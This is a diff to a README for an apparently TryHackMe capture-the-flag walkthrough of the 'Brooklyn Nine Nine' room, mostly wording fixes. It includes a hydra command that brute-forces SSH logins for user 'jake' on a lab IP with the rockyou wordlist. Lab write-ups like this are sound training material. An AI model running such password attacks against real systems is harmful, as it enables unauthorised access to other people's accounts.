M1kk4/THM/Brooklyn_Nine_Nine/README.md

 Enjoy!!
 </pre></code>
-<p>Nice we got Holt's password and now all we got to do is ssh in!</p>
+<p>Nice we got Holt's password and now all we have to do is ssh in!</p>
 <h2>NOTE</h2>
 <p>There is another way of getting into the machine.
-We know that Jake has weak password and we can use hydra to crack it</p>
+We know that Jake has weak password and we can use hydra to crack it.</p>
 <pre><code>
 $ hydra -l jake -P /opt/wordlists/rockyou.txt 10.10.48.118 ssh
 [DATA] max 16 tasks per 1 server, overall 16 tasks, 14344401 login tries (l:1/p:14344401), ~896526 tries per task